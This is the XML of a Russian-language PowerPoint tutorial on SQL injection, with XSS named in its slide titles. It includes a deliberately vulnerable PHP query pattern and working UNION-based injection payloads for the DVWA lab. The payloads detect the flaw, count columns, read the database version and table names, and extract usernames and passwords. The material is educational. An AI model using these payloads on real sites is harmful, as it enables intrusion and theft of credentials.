            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>для UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, все возвращенные строки будут уникальными, так как по умолчанию подразумевается </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" cap="small" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>distinct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>, который удаляет неуникальные значения.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15" y="1371787"/>
            <a:ext cx="5181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1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0661" y="223557"/>
            <a:ext cx="8696093" cy="1050439"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" smtClean="0"/>
              <a:t>Немного практики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8" y="1273996"/>
            <a:ext cx="6086475" cy="145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092520"/>
            <a:ext cx="613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SELECT * FROM `user` WHERE id = 1 UNION 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SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> * FROM `user` WHERE id = 2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707" y="3092520"/>
            <a:ext cx="6486875" cy="5604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226679"/>
            <a:ext cx="593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id, name FROM `user` WHERE id = 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UNION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>password, email FROM `user` WHERE id = 4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671" y="4226679"/>
            <a:ext cx="4207027" cy="6463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5476126"/>
            <a:ext cx="555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`user` WHERE id = 4  UNION SELECT password from `user` WHERE id = 3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39" y="4977471"/>
            <a:ext cx="5001581" cy="18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2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4573" y="-84761"/>
            <a:ext cx="10887548" cy="1214917"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-R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Как </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>вычислить уязвимость, позволяющую внедрять SQL инъекции</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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270" y="1304817"/>
            <a:ext cx="980154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большинстве случаев SQL-инъекцию можно легко обнаружить, указав недопустимые параметры, например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 есть тестовый веб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test.ru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сайте выводится список новостей, с возможностью детального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просмотра.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страницы с детальным описанием новости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выглядит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test.ru/?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detail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=1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Т.е через GET запрос переменная detail передаёт значение 1 (которое является идентификатором записи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новостей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Изменяем GET запрос на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?detail=1'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?detail=1".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пробуем передавать эти запросы серверу,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заходим на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test.ru/?detail=1'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на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test.ru/?detail=1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Тестировать можно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 варианты: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test.ru/?detail=4+OR+1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test.ru/?detail=4+--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test.ru/?detail=4+UNION+SELECT+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*+FROM+news+WHERE+id=4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2711" y="1929068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ru-RU" cap="none" dirty="0" smtClean="0"/>
              <a:t>Если Ошибку Не Выдало — Могут Быть Следующие Причины:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" cap="none" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" cap="none" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" cap="none" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" cap="none" dirty="0" smtClean="0"/>
              <a:t>1.SQL Инъекции Здесь Нет — Фильтруются Кавычки, Или Просто Стоит Преобразование В </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" cap="none" dirty="0" smtClean="0"/>
              <a:t>(Int)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" cap="none" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" cap="none" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" cap="none" dirty="0" smtClean="0"/>
              <a:t>2.Отключен Вывод Ошибок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21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664" y="203009"/>
            <a:ext cx="8534400" cy="120455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ошибки, возникающей при проверке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уязвимости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664" y="1825169"/>
            <a:ext cx="442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https://e3e5.com/article.php?id=445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5329355" y="1841816"/>
            <a:ext cx="821932" cy="246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497672" y="1763792"/>
            <a:ext cx="442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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e3e5.com/article.php?id=445’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6" y="2981442"/>
            <a:ext cx="97440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938" y="308225"/>
            <a:ext cx="10062557" cy="6339155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это работает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 :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$_GET['id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'];                        ID = 445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>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$query = "SELECT * FROM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id=$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id”;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Скрипт поймет это как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Article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id=445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"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cap="none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cap="none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cap="none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все же ошибку вывело — ура! Мы нашли первый </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" cap="none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cap="none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 SQL инъекции — числовой входящий параметр.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" cap="none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3411021" y="2732926"/>
            <a:ext cx="821932" cy="174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06894" y="1972638"/>
            <a:ext cx="6606283" cy="29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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e3e5.com/article.php?id=445’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027" y="4232954"/>
            <a:ext cx="3812677" cy="200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2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1658" y="575353"/>
            <a:ext cx="6801493" cy="129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44529" y="678094"/>
            <a:ext cx="7068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Подбираем количество полей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en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION </a:t>
            </a:r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ru-RU" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GROUP BY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Подбор полей делается очень просто, достаточно посылать такие запросы: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* FROM `user` WHERE id=1 UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1,2,3,4,5,6#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44529" y="2845941"/>
            <a:ext cx="8568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GROUP BY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Зачастую бывает, что полей может быть 20 или 40 или даже 60. Чтобы нам каждый раз не перебирать их, используем GROUP BY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Если запрос</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>http://sqlinj/index1.php?id=1 GROUP BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>не выдал ошибок, значит кол-во полей больше 2. Пробуем:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>http://sqlinj/index1.php?id=1 GROUP BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>Оп, видим ошибку, значит кол-во полей меньше 8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85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573" y="-177135"/>
            <a:ext cx="11558427" cy="752488"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" cap="none" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" cap="none" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3100" cap="none" dirty="0" smtClean="0"/>
              <a:t>Рассмотрим несколько примеров в приложении </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" cap="none" dirty="0" smtClean="0"/>
              <a:t>DVWA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3100" cap="none" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3100" cap="none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12" y="858965"/>
            <a:ext cx="8420100" cy="1914525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760287" y="3262045"/>
            <a:ext cx="544531" cy="15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503907" y="3154435"/>
            <a:ext cx="337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Проверяем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>уязвимость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744526" y="3154435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’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5828872" y="3262045"/>
            <a:ext cx="544531" cy="15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769753" y="3505090"/>
            <a:ext cx="4594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1' order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   |   1' union select 1,2,3#</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Стрелка вправо 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5828872" y="3642990"/>
            <a:ext cx="544531" cy="15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760287" y="3652995"/>
            <a:ext cx="544531" cy="15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495685" y="32389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Проверяем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0"/>
              <a:t>количество </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>столбиков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710626" y="3914519"/>
            <a:ext cx="3515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1' union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>null, version()#</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Стрелка вправо 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5828872" y="4035010"/>
            <a:ext cx="544531" cy="15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768849" y="4022129"/>
            <a:ext cx="544531" cy="15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495685" y="36369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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Проверяем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>версию базы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>данных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"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769753" y="4312009"/>
            <a:ext cx="3534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1' union select 1, database()#</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Стрелка вправо 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5828872" y="4415057"/>
            <a:ext cx="544531" cy="163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760286" y="4424180"/>
            <a:ext cx="544531" cy="15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525301" y="4283287"/>
            <a:ext cx="3206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Узнать назву </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>базы данных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541008" y="5291310"/>
            <a:ext cx="124574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1' union select  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password,0x0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>users#</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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41008" y="4828854"/>
            <a:ext cx="1059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Как узнать пароли юзеров ? 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41008" y="5666133"/>
            <a:ext cx="5194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Как узнать названия таблиц в базе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данных?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1603" y="6152618"/>
            <a:ext cx="843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1' union select  null, concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) from information_schema.tables WHERE table_schema = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'#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556858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3321</TotalTime>
  <Words>775</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Широкоэкранный</PresentationFormat>
  <Paragraphs>117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Century Gothic</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Сектор</vt:lpstr>
      <vt:lpstr>SQL инъекция — это один из самых доступных способов взлома сайта. </vt:lpstr>
      <vt:lpstr>UNION</vt:lpstr>
      <vt:lpstr>Немного практики</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Если Ошибку Не Выдало — Могут Быть Следующие Причины:  1.SQL Инъекции Здесь Нет — Фильтруются Кавычки, Или Просто Стоит Преобразование В (Int) 2.Отключен Вывод Ошибок.</vt:lpstr>
      <vt:lpstr>Пример ошибки, возникающей при проверке уязвимости:</vt:lpstr>
      <vt:lpstr>как это работает внутри:  REQUEST :  $id = $_GET['id'];                        ID = 445’ $query = "SELECT * FROM Article WHERE id=$id”;  Скрипт поймет это как SELECT * FROM Article WHERE id=445’    Если все же ошибку вывело — ура! Мы нашли первый  вид SQL инъекции — числовой входящий параметр.</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr> Рассмотрим несколько примеров в приложении DVWA  </vt:lpstr>
      <vt:lpstr>Что такое XSS-уязвимость?</vt:lpstr>
      <vt:lpstr>Как устроена уязвимость?</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Скрипт выполняется на стороне жертвы;  Скрипт не размещен на сайте.</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>DOM-Based XSS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инъекция — это один из самых доступных способов взлома сайта.</dc:title>
  <dc:creator>yura</dc:creator>
  <cp:lastModifiedBy>yura</cp:lastModifiedBy>
  <cp:revision>52</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-05T12:52:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-08T14:34:13Z</dcterms:modified>
</cp:coreProperties>
</file>